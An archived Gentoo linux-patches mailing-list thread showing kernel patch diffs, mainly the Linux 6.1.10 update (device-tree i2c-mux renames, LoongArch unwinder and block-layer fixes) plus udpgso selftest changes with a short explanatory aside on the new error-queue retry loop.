+@@ -281,6 +281,7 @@ sof_unprepare_widgets_in_path(struct snd_sof_dev *sdev, struct snd_soc_dapm_widg
+ 
+ 	swidget->prepared = false;
+ 
++sink_unprepare:
+ 	/* unprepare all widgets in the sink paths */
+ 	snd_soc_dapm_widget_for_each_sink_path(widget, p) {
+ 		if (!p->walking && p->sink->dobj.private) {
+@@ -303,7 +304,7 @@ sof_prepare_widgets_in_path(struct snd_sof_dev *sdev, struct snd_soc_dapm_widget
+ 	struct snd_soc_dapm_path *p;
+ 	int ret;
+ 
+-	if (!widget_ops[widget->id].ipc_prepare || swidget->prepared)
++	if (!swidget || !widget_ops[widget->id].ipc_prepare || swidget->prepared)
+ 		goto sink_prepare;
+ 
+ 	/* prepare the source widget */
+@@ -326,7 +327,8 @@ sink_prepare:
+ 			p->walking = false;
+ 			if (ret < 0) {
+ 				/* unprepare the source widget */
+-				if (widget_ops[widget->id].ipc_unprepare && swidget->prepared) {
++				if (widget_ops[widget->id].ipc_unprepare &&
++				    swidget && swidget->prepared) {
+ 					widget_ops[widget->id].ipc_unprepare(swidget);
+ 					swidget->prepared = false;
+ 				}
+diff --git a/tools/testing/selftests/cgroup/test_cpuset_prs.sh b/tools/testing/selftests/cgroup/test_cpuset_prs.sh
+index 526d2c42d8706..a503244852e4e 100755
+--- a/tools/testing/selftests/cgroup/test_cpuset_prs.sh
++++ b/tools/testing/selftests/cgroup/test_cpuset_prs.sh
+@@ -254,6 +254,7 @@ TEST_MATRIX=(
+ 	# Taking away all CPUs from parent or itself if there are tasks
+ 	# will make the partition invalid.
+ 	"  S+ C2-3:P1:S+  C3:P1  .      .      T     C2-3    .      .     0 A1:2-3,A2:2-3 A1:P1,A2:P-1"
++	"  S+  C3:P1:S+    C3    .      .      T      P1     .      .     0 A1:3,A2:3 A1:P1,A2:P-1"
+ 	"  S+ $SETUP_A123_PARTITIONS    .    T:C2-3   .      .      .     0 A1:2-3,A2:2-3,A3:3 A1:P1,A2:P-1,A3:P-1"
+ 	"  S+ $SETUP_A123_PARTITIONS    . T:C2-3:C1-3 .      .      .     0 A1:1,A2:2,A3:3 A1:P1,A2:P1,A3:P1"
+ 
+diff --git a/tools/testing/selftests/filesystems/fat/run_fat_tests.sh b/tools/testing/selftests/filesystems/fat/run_fat_tests.sh
+old mode 100644
+new mode 100755
+diff --git a/tools/testing/selftests/net/udpgso_bench.sh b/tools/testing/selftests/net/udpgso_bench.sh
+index dc932fd653634..640bc43452faa 100755
+--- a/tools/testing/selftests/net/udpgso_bench.sh
++++ b/tools/testing/selftests/net/udpgso_bench.sh
+@@ -7,6 +7,7 @@ readonly GREEN='\033[0;92m'
+ readonly YELLOW='\033[0;33m'
+ readonly RED='\033[0;31m'
+ readonly NC='\033[0m' # No Color
++readonly TESTPORT=8000
+ 
+ readonly KSFT_PASS=0
+ readonly KSFT_FAIL=1
+@@ -56,11 +57,26 @@ trap wake_children EXIT
+ 
+ run_one() {
+ 	local -r args=$@
++	local nr_socks=0
++	local i=0
++	local -r timeout=10
++
++	./udpgso_bench_rx -p "$TESTPORT" &
++	./udpgso_bench_rx -p "$TESTPORT" -t &
++
++	# Wait for the above test program to get ready to receive connections.
++	while [ "$i" -lt "$timeout" ]; do
++		nr_socks="$(ss -lnHi | grep -c "\*:${TESTPORT}")"
++		[ "$nr_socks" -eq 2 ] && break
++		i=$((i + 1))
++		sleep 1
++	done
++	if [ "$nr_socks" -ne 2 ]; then
++		echo "timed out while waiting for udpgso_bench_rx"
++		exit 1
++	fi
+ 
+-	./udpgso_bench_rx &
+-	./udpgso_bench_rx -t &
+-
+-	./udpgso_bench_tx ${args}
++	./udpgso_bench_tx -p "$TESTPORT" ${args}
+ }
+ 
+ run_in_netns() {
+diff --git a/tools/testing/selftests/net/udpgso_bench_rx.c b/tools/testing/selftests/net/udpgso_bench_rx.c
+index 6a193425c367f..4058c7451e70d 100644
+--- a/tools/testing/selftests/net/udpgso_bench_rx.c
++++ b/tools/testing/selftests/net/udpgso_bench_rx.c
+@@ -250,7 +250,7 @@ static int recv_msg(int fd, char *buf, int len, int *gso_size)
+ static void do_flush_udp(int fd)
+ {
+ 	static char rbuf[ETH_MAX_MTU];
+-	int ret, len, gso_size, budget = 256;
++	int ret, len, gso_size = 0, budget = 256;
+ 
+ 	len = cfg_read_all ? sizeof(rbuf) : 0;
+ 	while (budget--) {
+@@ -336,6 +336,8 @@ static void parse_opts(int argc, char **argv)
+ 			cfg_verify = true;
+ 			cfg_read_all = true;
+ 			break;
++		default:
++			exit(1);
+ 		}
+ 	}
+ 
+diff --git a/tools/testing/selftests/net/udpgso_bench_tx.c b/tools/testing/selftests/net/udpgso_bench_tx.c
+index f1fdaa2702913..477392715a9ad 100644
+--- a/tools/testing/selftests/net/udpgso_bench_tx.c
++++ b/tools/testing/selftests/net/udpgso_bench_tx.c
+@@ -62,6 +62,7 @@ static int	cfg_payload_len	= (1472 * 42);
+ static int	cfg_port	= 8000;
+ static int	cfg_runtime_ms	= -1;
+ static bool	cfg_poll;
++static int	cfg_poll_loop_timeout_ms = 2000;
+ static bool	cfg_segment;
+ static bool	cfg_sendmmsg;
+ static bool	cfg_tcp;
+@@ -235,16 +236,17 @@ static void flush_errqueue_recv(int fd)
+ 	}
+ }
+ 
+-static void flush_errqueue(int fd, const bool do_poll)
++static void flush_errqueue(int fd, const bool do_poll,
++			   unsigned long poll_timeout, const bool poll_err)
+ {
+ 	if (do_poll) {
+ 		struct pollfd fds = {0};
+ 		int ret;
+ 
+ 		fds.fd = fd;
+-		ret = poll(&fds, 1, 500);
++		ret = poll(&fds, 1, poll_timeout);
+ 		if (ret == 0) {
+-			if (cfg_verbose)
++			if ((cfg_verbose) && (poll_err))
+ 				fprintf(stderr, "poll timeout\n");
+ 		} else if (ret < 0) {
+ 			error(1, errno, "poll");
+@@ -254,6 +256,20 @@ static void flush_errqueue(int fd, const bool do_poll)
+ 	flush_errqueue_recv(fd);
+ }
+ 
++static void flush_errqueue_retry(int fd, unsigned long num_sends)
++{
++	unsigned long tnow, tstop;
++	bool first_try = true;
++
++	tnow = gettimeofday_ms();
++	tstop = tnow + cfg_poll_loop_timeout_ms;
++	do {
++		flush_errqueue(fd, true, tstop - tnow, first_try);
++		first_try = false;
++		tnow = gettimeofday_ms();
++	} while ((stat_zcopies != num_sends) && (tnow < tstop));
++}
++
+ static int send_tcp(int fd, char *data)
+ {
+ 	int ret, done = 0, count = 0;
+@@ -413,7 +429,8 @@ static int send_udp_segment(int fd, char *data)
+ 
+ static void usage(const char *filepath)
+ {
+-	error(1, 0, "Usage: %s [-46acmHPtTuvz] [-C cpu] [-D dst ip] [-l secs] [-M messagenr] [-p port] [-s sendsize] [-S gsosize]",
++	error(1, 0, "Usage: %s [-46acmHPtTuvz] [-C cpu] [-D dst ip] [-l secs] "
++		    "[-L secs] [-M messagenr] [-p port] [-s sendsize] [-S gsosize]",
+ 		    filepath);
+ }
+ 
+@@ -423,7 +440,7 @@ static void parse_opts(int argc, char **argv)
+ 	int max_len, hdrlen;
+ 	int c;
+ 
+-	while ((c = getopt(argc, argv, "46acC:D:Hl:mM:p:s:PS:tTuvz")) != -1) {
++	while ((c = getopt(argc, argv, "46acC:D:Hl:L:mM:p:s:PS:tTuvz")) != -1) {
+ 		switch (c) {
+ 		case '4':
+ 			if (cfg_family != PF_UNSPEC)
+@@ -452,6 +469,9 @@ static void parse_opts(int argc, char **argv)
+ 		case 'l':
+ 			cfg_runtime_ms = strtoul(optarg, NULL, 10) * 1000;
+ 			break;
++		case 'L':
++			cfg_poll_loop_timeout_ms = strtoul(optarg, NULL, 10) * 1000;
++			break;
+ 		case 'm':
+ 			cfg_sendmmsg = true;
+ 			break;
+@@ -490,6 +510,8 @@ static void parse_opts(int argc, char **argv)
+ 		case 'z':
+ 			cfg_zerocopy = true;
+ 			break;
++		default:
++			exit(1);
+ 		}
+ 	}
+ 
+@@ -677,7 +699,7 @@ int main(int argc, char **argv)
+ 			num_sends += send_udp(fd, buf[i]);
+ 		num_msgs++;
+ 		if ((cfg_zerocopy && ((num_msgs & 0xF) == 0)) || cfg_tx_tstamp)
+-			flush_errqueue(fd, cfg_poll);
++			flush_errqueue(fd, cfg_poll, 500, true);
+ 
+ 		if (cfg_msg_nr && num_msgs >= cfg_msg_nr)
+ 			break;
+@@ -696,7 +718,7 @@ int main(int argc, char **argv)
+ 	} while (!interrupted && (cfg_runtime_ms == -1 || tnow < tstop));
+ 
+ 	if (cfg_zerocopy || cfg_tx_tstamp)
+-		flush_errqueue(fd, true);
++		flush_errqueue_retry(fd, num_sends);
+ 
+ 	if (close(fd))
+ 		error(1, errno, "close");
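+
+[The new flush_errqueue_retry() above turns the selftest's final error-queue flush into a deadline-bounded loop: it keeps polling and draining until every zerocopy send has reported a completion (stat_zcopies == num_sends) or the -L timeout expires, instead of one fixed 500 ms poll. A reduced sketch of that loop shape; drain_once is a stand-in for the real poll()+MSG_ERRQUEUE drain:
+
+#include <stdio.h>
+#include <sys/time.h>
+
+static unsigned long gettimeofday_ms(void)
+{
+	struct timeval tv;
+
+	gettimeofday(&tv, NULL);
+	return tv.tv_sec * 1000UL + tv.tv_usec / 1000UL;
+}
+
+static unsigned long completions;
+
+/* stand-in for one drain pass over the socket error queue */
+static void drain_once(void)
+{
+	completions++;
+}
+
+int main(void)
+{
+	const unsigned long num_sends = 5, timeout_ms = 2000;
+	unsigned long tnow = gettimeofday_ms();
+	unsigned long tstop = tnow + timeout_ms;
+
+	do {
+		drain_once();
+		tnow = gettimeofday_ms();
+	} while (completions != num_sends && tnow < tstop);
+
+	printf("drained %lu of %lu completions\n", completions, num_sends);
+	return 0;
+}]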


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-02-06 12:46 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-02-06 12:46 UTC (permalink / raw
  To: gentoo-commits

commit:     a2caeaa3d282040a954d3b967fa62e1b3bbbd71b
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Mon Feb  6 12:46:18 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Mon Feb  6 12:46:18 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=a2caeaa3

Linux patch 6.1.10

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |   4 +
 1009_linux-6.1.10.patch | 855 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 859 insertions(+)

diff --git a/0000_README b/0000_README
index 1f899f11..10671afd 100644
--- a/0000_README
+++ b/0000_README
@@ -79,6 +79,10 @@ Patch:  1008_linux-6.1.9.patch
 From:   http://www.kernel.org
 Desc:   Linux 6.1.9
 
+Patch:  1009_linux-6.1.10.patch
+From:   http://www.kernel.org
+Desc:   Linux 6.1.10
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1009_linux-6.1.10.patch b/1009_linux-6.1.10.patch
new file mode 100644
index 00000000..3d6ca3ee
--- /dev/null
+++ b/1009_linux-6.1.10.patch
@@ -0,0 +1,855 @@
+diff --git a/Makefile b/Makefile
+index 3778b422fa113..6e34c942744e3 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 9
++SUBLEVEL = 10
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm/boot/dts/imx53-ppd.dts b/arch/arm/boot/dts/imx53-ppd.dts
+index 37d0cffea99c5..70c4a4852256c 100644
+--- a/arch/arm/boot/dts/imx53-ppd.dts
++++ b/arch/arm/boot/dts/imx53-ppd.dts
+@@ -488,7 +488,7 @@
+ 	scl-gpios = <&gpio3 21 GPIO_ACTIVE_HIGH>;
+ 	status = "okay";
+ 
+-	i2c-switch@70 {
++	i2c-mux@70 {
+ 		compatible = "nxp,pca9547";
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+diff --git a/arch/arm/boot/dts/vf610-zii-dev-rev-b.dts b/arch/arm/boot/dts/vf610-zii-dev-rev-b.dts
+index 42ed4a04a12e2..6280c5e86a124 100644
+--- a/arch/arm/boot/dts/vf610-zii-dev-rev-b.dts
++++ b/arch/arm/boot/dts/vf610-zii-dev-rev-b.dts
+@@ -345,7 +345,7 @@
+ };
+ 
+ &i2c2 {
+-	tca9548@70 {
++	i2c-mux@70 {
+ 		compatible = "nxp,pca9548";
+ 		pinctrl-0 = <&pinctrl_i2c_mux_reset>;
+ 		pinctrl-names = "default";
+diff --git a/arch/arm/boot/dts/vf610-zii-dev-rev-c.dts b/arch/arm/boot/dts/vf610-zii-dev-rev-c.dts
+index de79dcfd32e62..ba2001f373158 100644
+--- a/arch/arm/boot/dts/vf610-zii-dev-rev-c.dts
++++ b/arch/arm/boot/dts/vf610-zii-dev-rev-c.dts
+@@ -340,7 +340,7 @@
+ };
+ 
+ &i2c2 {
+-	tca9548@70 {
++	i2c-mux@70 {
+ 		compatible = "nxp,pca9548";
+ 		pinctrl-0 = <&pinctrl_i2c_mux_reset>;
+ 		pinctrl-names = "default";
+diff --git a/arch/arm/mach-omap1/gpio15xx.c b/arch/arm/mach-omap1/gpio15xx.c
+index c675f11de99db..61fa26efd8653 100644
+--- a/arch/arm/mach-omap1/gpio15xx.c
++++ b/arch/arm/mach-omap1/gpio15xx.c
+@@ -11,6 +11,7 @@
+ #include <linux/gpio.h>
+ #include <linux/platform_data/gpio-omap.h>
+ #include <linux/soc/ti/omap1-soc.h>
++#include <asm/irq.h>
+ 
+ #include "irqs.h"
+ 
+diff --git a/arch/arm64/boot/dts/freescale/fsl-ls1012a-qds.dts b/arch/arm64/boot/dts/freescale/fsl-ls1012a-qds.dts
+index 5a8d85a7d1612..bbdf989058ff7 100644
+--- a/arch/arm64/boot/dts/freescale/fsl-ls1012a-qds.dts
++++ b/arch/arm64/boot/dts/freescale/fsl-ls1012a-qds.dts
+@@ -110,7 +110,7 @@
+ &i2c0 {
+ 	status = "okay";
+ 
+-	pca9547@77 {
++	i2c-mux@77 {
+ 		compatible = "nxp,pca9547";
+ 		reg = <0x77>;
+ 		#address-cells = <1>;
+diff --git a/arch/arm64/boot/dts/freescale/fsl-ls1043a-qds.dts b/arch/arm64/boot/dts/freescale/fsl-ls1043a-qds.dts
+index 9b726c2a48426..dda27ed7aaf2b 100644
+--- a/arch/arm64/boot/dts/freescale/fsl-ls1043a-qds.dts
++++ b/arch/arm64/boot/dts/freescale/fsl-ls1043a-qds.dts
+@@ -89,7 +89,7 @@
+ &i2c0 {
+ 	status = "okay";
+ 
+-	pca9547@77 {
++	i2c-mux@77 {
+ 		compatible = "nxp,pca9547";
+ 		reg = <0x77>;
+ 		#address-cells = <1>;
+diff --git a/arch/arm64/boot/dts/freescale/fsl-ls1046a-qds.dts b/arch/arm64/boot/dts/freescale/fsl-ls1046a-qds.dts
+index b2fcbba60d3ac..3b0ed9305f2bd 100644
+--- a/arch/arm64/boot/dts/freescale/fsl-ls1046a-qds.dts
++++ b/arch/arm64/boot/dts/freescale/fsl-ls1046a-qds.dts
+@@ -88,7 +88,7 @@
+ &i2c0 {
+ 	status = "okay";
+ 
+-	pca9547@77 {
++	i2c-mux@77 {
+ 		compatible = "nxp,pca9547";
+ 		reg = <0x77>;
+ 		#address-cells = <1>;
+diff --git a/arch/arm64/boot/dts/freescale/fsl-ls1088a-qds.dts b/arch/arm64/boot/dts/freescale/fsl-ls1088a-qds.dts
+index 41d8b15f25a54..aa52ff73ff9e0 100644
+--- a/arch/arm64/boot/dts/freescale/fsl-ls1088a-qds.dts
++++ b/arch/arm64/boot/dts/freescale/fsl-ls1088a-qds.dts
+@@ -53,7 +53,7 @@
+ &i2c0 {
+ 	status = "okay";
+ 
+-	i2c-switch@77 {
++	i2c-mux@77 {
+ 		compatible = "nxp,pca9547";
+ 		reg = <0x77>;
+ 		#address-cells = <1>;
+diff --git a/arch/arm64/boot/dts/freescale/fsl-ls1088a-rdb.dts b/arch/arm64/boot/dts/freescale/fsl-ls1088a-rdb.dts
+index 1bfbce69cc8b7..ee8e932628d17 100644
+--- a/arch/arm64/boot/dts/freescale/fsl-ls1088a-rdb.dts
++++ b/arch/arm64/boot/dts/freescale/fsl-ls1088a-rdb.dts
+@@ -136,7 +136,7 @@
+ &i2c0 {
+ 	status = "okay";
+ 
+-	i2c-switch@77 {
++	i2c-mux@77 {
+ 		compatible = "nxp,pca9547";
+ 		reg = <0x77>;
+ 		#address-cells = <1>;
+diff --git a/arch/arm64/boot/dts/freescale/fsl-ls1088a-ten64.dts b/arch/arm64/boot/dts/freescale/fsl-ls1088a-ten64.dts
+index ef6c8967533ef..d4867d6cf47cd 100644
+--- a/arch/arm64/boot/dts/freescale/fsl-ls1088a-ten64.dts
++++ b/arch/arm64/boot/dts/freescale/fsl-ls1088a-ten64.dts
+@@ -245,7 +245,7 @@
+ &i2c3 {
+ 	status = "okay";
+ 
+-	i2c-switch@70 {
++	i2c-mux@70 {
+ 		compatible = "nxp,pca9540";
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+diff --git a/arch/arm64/boot/dts/freescale/fsl-ls208xa-qds.dtsi b/arch/arm64/boot/dts/freescale/fsl-ls208xa-qds.dtsi
+index f598669e742fc..52c5a43b30a0f 100644
+--- a/arch/arm64/boot/dts/freescale/fsl-ls208xa-qds.dtsi
++++ b/arch/arm64/boot/dts/freescale/fsl-ls208xa-qds.dtsi
+@@ -103,7 +103,7 @@
+ 
+ &i2c0 {
+ 	status = "okay";
+-	pca9547@77 {
++	i2c-mux@77 {
+ 		compatible = "nxp,pca9547";
+ 		reg = <0x77>;
+ 		#address-cells = <1>;
+diff --git a/arch/arm64/boot/dts/freescale/fsl-ls208xa-rdb.dtsi b/arch/arm64/boot/dts/freescale/fsl-ls208xa-rdb.dtsi
+index 3d9647b3da147..537cecb13dd08 100644
+--- a/arch/arm64/boot/dts/freescale/fsl-ls208xa-rdb.dtsi
++++ b/arch/arm64/boot/dts/freescale/fsl-ls208xa-rdb.dtsi
+@@ -44,7 +44,7 @@
+ 
+ &i2c0 {
+ 	status = "okay";
+-	pca9547@75 {
++	i2c-mux@75 {
+ 		compatible = "nxp,pca9547";
+ 		reg = <0x75>;
+ 		#address-cells = <1>;
+diff --git a/arch/arm64/boot/dts/freescale/fsl-lx2160a-cex7.dtsi b/arch/arm64/boot/dts/freescale/fsl-lx2160a-cex7.dtsi
+index afb455210bd07..d32a52ab00a42 100644
+--- a/arch/arm64/boot/dts/freescale/fsl-lx2160a-cex7.dtsi
++++ b/arch/arm64/boot/dts/freescale/fsl-lx2160a-cex7.dtsi
+@@ -54,7 +54,7 @@
+ &i2c0 {
+ 	status = "okay";
+ 
+-	i2c-switch@77 {
++	i2c-mux@77 {
+ 		compatible = "nxp,pca9547";
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-nitrogen-r2.dts b/arch/arm64/boot/dts/freescale/imx8mm-nitrogen-r2.dts
+index 74c09891600f2..6357078185edd 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-nitrogen-r2.dts
++++ b/arch/arm64/boot/dts/freescale/imx8mm-nitrogen-r2.dts
+@@ -214,7 +214,7 @@
+ 	pinctrl-0 = <&pinctrl_i2c3>;
+ 	status = "okay";
+ 
+-	i2cmux@70 {
++	i2c-mux@70 {
+ 		compatible = "nxp,pca9540";
+ 		reg = <0x70>;
+ 		#address-cells = <1>;
+diff --git a/arch/arm64/boot/dts/freescale/imx8mq-nitrogen.dts b/arch/arm64/boot/dts/freescale/imx8mq-nitrogen.dts
+index 9dda2a1554c32..8614c18b5998c 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mq-nitrogen.dts
++++ b/arch/arm64/boot/dts/freescale/imx8mq-nitrogen.dts
+@@ -133,7 +133,7 @@
+ 	pinctrl-0 = <&pinctrl_i2c1>;
+ 	status = "okay";
+ 
+-	i2cmux@70 {
++	i2c-mux@70 {
+ 		compatible = "nxp,pca9546";
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_i2c1_pca9546>;
+@@ -216,7 +216,7 @@
+ 	pinctrl-0 = <&pinctrl_i2c4>;
+ 	status = "okay";
+ 
+-	pca9546: i2cmux@70 {
++	pca9546: i2c-mux@70 {
+ 		compatible = "nxp,pca9546";
+ 		reg = <0x70>;
+ 		#address-cells = <1>;
+diff --git a/arch/arm64/boot/dts/freescale/imx8mq-thor96.dts b/arch/arm64/boot/dts/freescale/imx8mq-thor96.dts
+index 5d5aa6537225f..6e6182709d220 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mq-thor96.dts
++++ b/arch/arm64/boot/dts/freescale/imx8mq-thor96.dts
+@@ -339,7 +339,7 @@
+ 	bus-width = <4>;
+ 	non-removable;
+ 	no-sd;
+-	no-emmc;
++	no-mmc;
+ 	status = "okay";
+ 
+ 	brcmf: wifi@1 {
+@@ -359,7 +359,7 @@
+ 	cd-gpios = <&gpio2 12 GPIO_ACTIVE_LOW>;
+ 	bus-width = <4>;
+ 	no-sdio;
+-	no-emmc;
++	no-mmc;
+ 	disable-wp;
+ 	status = "okay";
+ };
+diff --git a/arch/arm64/boot/dts/freescale/imx8qxp-mek.dts b/arch/arm64/boot/dts/freescale/imx8qxp-mek.dts
+index 07d8dd8160f68..afa883389456c 100644
+--- a/arch/arm64/boot/dts/freescale/imx8qxp-mek.dts
++++ b/arch/arm64/boot/dts/freescale/imx8qxp-mek.dts
+@@ -61,7 +61,7 @@
+ 	pinctrl-0 = <&pinctrl_lpi2c1 &pinctrl_ioexp_rst>;
+ 	status = "okay";
+ 
+-	i2c-switch@71 {
++	i2c-mux@71 {
+ 		compatible = "nxp,pca9646", "nxp,pca9546";
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+diff --git a/arch/arm64/boot/dts/qcom/msm8994-huawei-angler-rev-101.dts b/arch/arm64/boot/dts/qcom/msm8994-huawei-angler-rev-101.dts
+index dbfbb77e9ff57..7e2c0dcc11ab1 100644
+--- a/arch/arm64/boot/dts/qcom/msm8994-huawei-angler-rev-101.dts
++++ b/arch/arm64/boot/dts/qcom/msm8994-huawei-angler-rev-101.dts
+@@ -8,9 +8,6 @@
+ 
+ #include "msm8994.dtsi"
+ 
+-/* Angler's firmware does not report where the memory is allocated */
+-/delete-node/ &cont_splash_mem;
+-
+ / {
+ 	model = "Huawei Nexus 6P";
+ 	compatible = "huawei,angler", "qcom,msm8994";
+@@ -27,6 +24,22 @@
+ 	chosen {
+ 		stdout-path = "serial0:115200n8";
+ 	};
++
++	reserved-memory {
++		#address-cells = <2>;
++		#size-cells = <2>;
++		ranges;
++
++		tzapp_mem: tzapp@4800000 {
++			reg = <0 0x04800000 0 0x1900000>;
++			no-map;
++		};
++
++		removed_region: reserved@6300000 {
++			reg = <0 0x06300000 0 0xD00000>;
++			no-map;
++		};
++	};
+ };
+ 
+ &blsp1_uart2 {
+diff --git a/arch/loongarch/kernel/process.c b/arch/loongarch/kernel/process.c
+index ddb8ba4eb399d..90a5de7463326 100644
+--- a/arch/loongarch/kernel/process.c
++++ b/arch/loongarch/kernel/process.c
+@@ -185,20 +185,14 @@ out:
+ 
+ unsigned long __get_wchan(struct task_struct *task)
+ {
+-	unsigned long pc;
++	unsigned long pc = 0;
+ 	struct unwind_state state;
+ 
+ 	if (!try_get_task_stack(task))
+ 		return 0;
+ 
+-	unwind_start(&state, task, NULL);
+-	state.sp = thread_saved_fp(task);
+-	get_stack_info(state.sp, state.task, &state.stack_info);
+-	state.pc = thread_saved_ra(task);
+-#ifdef CONFIG_UNWINDER_PROLOGUE
+-	state.type = UNWINDER_PROLOGUE;
+-#endif
+-	for (; !unwind_done(&state); unwind_next_frame(&state)) {
++	for (unwind_start(&state, task, NULL);
++	     !unwind_done(&state); unwind_next_frame(&state)) {
+ 		pc = unwind_get_return_address(&state);
+ 		if (!pc)
+ 			break;
+diff --git a/arch/loongarch/kernel/unwind_guess.c b/arch/loongarch/kernel/unwind_guess.c
+index 5afa6064d73e4..0c20e5184de60 100644
+--- a/arch/loongarch/kernel/unwind_guess.c
++++ b/arch/loongarch/kernel/unwind_guess.c
+@@ -25,6 +25,12 @@ void unwind_start(struct unwind_state *state, struct task_struct *task,
+ 	if (regs) {
+ 		state->sp = regs->regs[3];
+ 		state->pc = regs->csr_era;
++	} else if (task && task != current) {
++		state->sp = thread_saved_fp(task);
++		state->pc = thread_saved_ra(task);
++	} else {
++		state->sp = (unsigned long)__builtin_frame_address(0);
++		state->pc = (unsigned long)__builtin_return_address(0);
+ 	}
+ 
+ 	state->task = task;
+diff --git a/arch/loongarch/kernel/unwind_prologue.c b/arch/loongarch/kernel/unwind_prologue.c
+index 4571c3c87cd4c..1c5b65756144d 100644
+--- a/arch/loongarch/kernel/unwind_prologue.c
++++ b/arch/loongarch/kernel/unwind_prologue.c
+@@ -111,12 +111,22 @@ void unwind_start(struct unwind_state *state, struct task_struct *task,
+ 		    struct pt_regs *regs)
+ {
+ 	memset(state, 0, sizeof(*state));
++	state->type = UNWINDER_PROLOGUE;
+ 
+-	if (regs &&  __kernel_text_address(regs->csr_era)) {
+-		state->pc = regs->csr_era;
++	if (regs) {
+ 		state->sp = regs->regs[3];
++		state->pc = regs->csr_era;
+ 		state->ra = regs->regs[1];
+-		state->type = UNWINDER_PROLOGUE;
++		if (!__kernel_text_address(state->pc))
++			state->type = UNWINDER_GUESS;
++	} else if (task && task != current) {
++		state->sp = thread_saved_fp(task);
++		state->pc = thread_saved_ra(task);
++		state->ra = 0;
++	} else {
++		state->sp = (unsigned long)__builtin_frame_address(0);
++		state->pc = (unsigned long)__builtin_return_address(0);
++		state->ra = 0;
+ 	}
+ 
+ 	state->task = task;
+diff --git a/arch/s390/kernel/setup.c b/arch/s390/kernel/setup.c
+index ab19ddb09d65e..2ec5f1e0312fa 100644
+--- a/arch/s390/kernel/setup.c
++++ b/arch/s390/kernel/setup.c
+@@ -507,6 +507,7 @@ static void __init setup_lowcore_dat_on(void)
+ {
+ 	struct lowcore *abs_lc;
+ 	unsigned long flags;
++	int i;
+ 
+ 	__ctl_clear_bit(0, 28);
+ 	S390_lowcore.external_new_psw.mask |= PSW_MASK_DAT;
+@@ -521,8 +522,8 @@ static void __init setup_lowcore_dat_on(void)
+ 	abs_lc = get_abs_lowcore(&flags);
+ 	abs_lc->restart_flags = RESTART_FLAG_CTLREGS;
+ 	abs_lc->program_new_psw = S390_lowcore.program_new_psw;
+-	memcpy(abs_lc->cregs_save_area, S390_lowcore.cregs_save_area,
+-	       sizeof(abs_lc->cregs_save_area));
++	for (i = 0; i < 16; i++)
++		abs_lc->cregs_save_area[i] = S390_lowcore.cregs_save_area[i];
+ 	put_abs_lowcore(abs_lc, flags);
+ }
+ 
+diff --git a/block/blk-cgroup.c b/block/blk-cgroup.c
+index fcf9cf49f5de1..7c91d9195da8d 100644
+--- a/block/blk-cgroup.c
++++ b/block/blk-cgroup.c
+@@ -1408,6 +1408,10 @@ retry:
+ 		list_for_each_entry_reverse(blkg, &q->blkg_list, q_node)
+ 			pol->pd_init_fn(blkg->pd[pol->plid]);
+ 
++	if (pol->pd_online_fn)
++		list_for_each_entry_reverse(blkg, &q->blkg_list, q_node)
++			pol->pd_online_fn(blkg->pd[pol->plid]);
++
+ 	__set_bit(pol->plid, q->blkcg_pols);
+ 	ret = 0;
+ 
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index 63abbe342b28c..83fbc7c546172 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -2858,6 +2858,7 @@ static inline struct request *blk_mq_get_cached_request(struct request_queue *q,
+ 		struct blk_plug *plug, struct bio **bio, unsigned int nsegs)
+ {
+ 	struct request *rq;
++	enum hctx_type type, hctx_type;
+ 
+ 	if (!plug)
+ 		return NULL;
+@@ -2870,7 +2871,10 @@ static inline struct request *blk_mq_get_cached_request(struct request_queue *q,
+ 		return NULL;
+ 	}
+ 
+-	if (blk_mq_get_hctx_type((*bio)->bi_opf) != rq->mq_hctx->type)
++	type = blk_mq_get_hctx_type((*bio)->bi_opf);
++	hctx_type = rq->mq_hctx->type;
++	if (type != hctx_type &&
++	    !(type == HCTX_TYPE_READ && hctx_type == HCTX_TYPE_DEFAULT))
+ 		return NULL;
+ 	if (op_is_flush(rq->cmd_flags) != op_is_flush((*bio)->bi_opf))
+ 		return NULL;
+diff --git a/drivers/acpi/video_detect.c b/drivers/acpi/video_detect.c
+index 5c32b318c173d..b48f85c3791e9 100644
+--- a/drivers/acpi/video_detect.c
++++ b/drivers/acpi/video_detect.c
+@@ -493,6 +493,14 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 		DMI_MATCH(DMI_PRODUCT_NAME, "Precision 7510"),
+ 		},
+ 	},
++	{
++	 .callback = video_detect_force_native,
++	 /* Acer Aspire 4810T */
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "Acer"),
++		DMI_MATCH(DMI_PRODUCT_NAME, "Aspire 4810T"),
++		},
++	},
+ 	{
+ 	 .callback = video_detect_force_native,
+ 	 /* Acer Aspire 5738z */
+diff --git a/drivers/dma/imx-sdma.c b/drivers/dma/imx-sdma.c
+index fbea5f62dd98b..b926abe4fa43a 100644
+--- a/drivers/dma/imx-sdma.c
++++ b/drivers/dma/imx-sdma.c
